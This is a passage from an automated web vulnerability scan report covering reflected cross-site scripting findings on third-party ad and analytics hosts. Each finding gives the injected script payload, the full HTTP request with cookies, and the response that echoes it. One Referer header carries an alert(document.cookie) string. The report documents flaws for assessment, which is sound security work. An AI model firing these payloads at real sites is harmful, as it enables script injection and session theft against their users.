Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload f9bd2<script>alert(1)</script>c18ecd985dc was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15f9bd2<script>alert(1)</script>c18ecd985dc&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15f9bd2<script>alert(1)</script>c18ecd985dc", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.185. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload c4d59<script>alert(1)</script>5d1bee0e299 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477c4d59<script>alert(1)</script>5d1bee0e299&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477c4d59<script>alert(1)</script>5d1bee0e299", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.186. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 5e148<script>alert(1)</script>915272d1a71 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=5e148<script>alert(1)</script>915272d1a71&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"5e148<script>alert(1)</script>915272d1a71", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.187. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e262a<script>alert(1)</script>dc6ca0c95b2 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=e262a<script>alert(1)</script>dc6ca0c95b2&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"e262a<script>alert(1)</script>dc6ca0c95b2", c10:"3182236", c15:"", c16:"", r:""});

4.188. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c016f"><script>alert(1)</script>86f916feeee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMc016f"><script>alert(1)</script>86f916feeee/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:39:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DMc016f"><script>alert(1)</script>86f916feeee/DLX/748763882/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.189. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b35e"><script>alert(1)</script>2e539209f83 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX8b35e"><script>alert(1)</script>2e539209f83/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:40:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 327
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX8b35e"><script>alert(1)</script>2e539209f83/657834999/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.190. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdced"><script>alert(1)</script>cd9f8b1c148 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x71fdced"><script>alert(1)</script>cd9f8b1c148 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; session=1296224086|1296224086

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:40:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 319
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/526055400/x71fdced"><script>alert(1)</script>cd9f8b1c148/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SRC
...[SNIP]...

4.191. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b07e"><script>alert(1)</script>4c5c59de13c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB31b07e"><script>alert(1)</script>4c5c59de13c/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB31b07e"><script>alert(1)</script>4c5c59de13c/ATTWL/11Q1/MobRON/300/1[timestamp]/362496024/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.192. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a83be"><script>alert(1)</script>51bef4a3ae4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWLa83be"><script>alert(1)</script>51bef4a3ae4/11Q1/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWLa83be"><script>alert(1)</script>51bef4a3ae4/11Q1/MobRON/300/1[timestamp]/1242839644/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.193. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd03"><script>alert(1)</script>7b8086e554f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q14cd03"><script>alert(1)</script>7b8086e554f/MobRON/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q14cd03"><script>alert(1)</script>7b8086e554f/MobRON/300/1[timestamp]/557312855/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.194. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0b5f"><script>alert(1)</script>adf8fbdc8c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRONd0b5f"><script>alert(1)</script>adf8fbdc8c0/300/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 367
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRONd0b5f"><script>alert(1)</script>adf8fbdc8c0/300/1[timestamp]/1193233704/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.195. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302ac"><script>alert(1)</script>aecd486426b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300302ac"><script>alert(1)</script>aecd486426b/1[timestamp]@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 366
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/CollectiveB3/ATTWL/11Q1/MobRON/300302ac"><script>alert(1)</script>aecd486426b/1[timestamp]/701616580/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

4.196. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb20"><script>alert(1)</script>2288154c82a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90bbb20"><script>alert(1)</script>2288154c82a HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:59:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 359
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/

